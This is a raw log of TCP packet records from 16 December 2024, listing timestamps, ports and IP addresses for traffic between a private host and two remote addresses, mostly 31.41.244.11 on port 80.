                                                                                                                                                                                              Dec 16, 2024 01:01:42.124577999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.126043081 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.126111984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.126154900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.126204014 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.127777100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.127825022 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.127876997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.127921104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.129545927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.129602909 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.129648924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.129699945 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.131252050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.131304979 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.131365061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.131422043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.132987022 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.133038998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.133117914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.133169889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.134726048 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.134774923 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.134833097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.134880066 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.136444092 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.136504889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.136560917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.136610985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.138205051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.138248920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.138340950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.138386011 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.139895916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.139956951 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.140002012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.140047073 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.141623974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.141679049 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.141736031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.141787052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.143371105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.143423080 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.143476963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.143523932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.145149946 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.145200968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.145253897 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.145294905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.146852970 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.146917105 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.146933079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.146982908 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.148572922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.148624897 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.148669958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.148721933 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.150305033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.150361061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.150408030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.150454998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.152023077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.152075052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.152131081 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.152187109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.153783083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.153830051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.153883934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.153930902 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.155500889 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.155555964 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.155592918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.155642033 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.157255888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.157327890 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.157372952 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.157427073 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.158965111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.159028053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.159080982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.159131050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.160974979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.161042929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.161091089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.161149979 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.162673950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.162720919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.162746906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.162771940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.164272070 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.164336920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.164366007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.164429903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.165980101 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.166035891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.166110992 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.166157961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.167658091 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.167717934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.167731047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.167776108 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.169411898 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.169466972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.169554949 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.169605970 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.174385071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.174436092 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.174449921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.174477100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.174484015 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.174519062 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.174525023 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.174566984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.175915003 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.175961018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.176042080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.176084995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.213985920 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.214068890 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:42.249224901 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:42.249254942 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.250101089 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.282413006 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.282465935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.282490015 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.282540083 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.284666061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.284707069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.284739017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.284775019 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.285895109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.285933971 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.285948038 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.285986900 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.286081076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.286133051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.286206961 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.286254883 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.287615061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.287667990 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.287744045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.287796021 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.289395094 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.289453983 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.289737940 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.289788008 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293263912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293317080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293332100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293355942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293371916 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293397903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293405056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293445110 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293683052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.293734074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.294341087 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.294673920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.295608997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.295672894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.295768976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.295819998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.297749043 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.297787905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.297801971 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.297838926 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.298693895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.298749924 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.298875093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.298923969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.300707102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.300756931 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.300875902 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.300926924 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.301567078 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.301603079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.301615953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.301661968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.303153992 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.303189993 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.303203106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.303241014 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.304075956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.304112911 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.304125071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.304155111 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.305619001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.305655956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.305666924 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.305704117 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.307821989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.307874918 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.307987928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.308037996 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.308873892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.308911085 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.308923960 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.308962107 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.309851885 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.309886932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.309900999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.309930086 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.310945988 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.310997009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.311206102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.311256886 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.313705921 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.313770056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.313846111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.313899040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.314363003 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.314399958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.314412117 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.314450026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.315303087 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.315357924 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.315629959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.315685987 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.317068100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.317110062 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.317126036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.317161083 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.319506884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.319564104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.319689989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.319737911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.320425034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.320461035 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.320478916 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.320509911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.320890903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.320981026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.321011066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.321064949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.322715044 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.322751999 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.322773933 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.322808027 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.323962927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.324016094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.324358940 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.324433088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.326515913 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.326551914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.326570988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.326591015 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.326596022 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.326641083 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.326709032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.326760054 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.328119040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.328174114 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.328644037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.328702927 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.329801083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.329837084 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.329873085 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.329912901 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.330888987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.330944061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.330959082 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.331016064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.332310915 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.332361937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.332437038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.332487106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.333750010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.333806038 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.333882093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.333934069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338217020 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338239908 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338284969 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338284969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338284969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338323116 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338337898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338360071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338376045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338401079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338422060 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.338459969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.339622021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.339659929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.339673996 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.339706898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.342822075 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.342902899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.342909098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.342943907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.342963934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.342986107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.342991114 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.343043089 CET4984880192.168.2.431.41.244.11
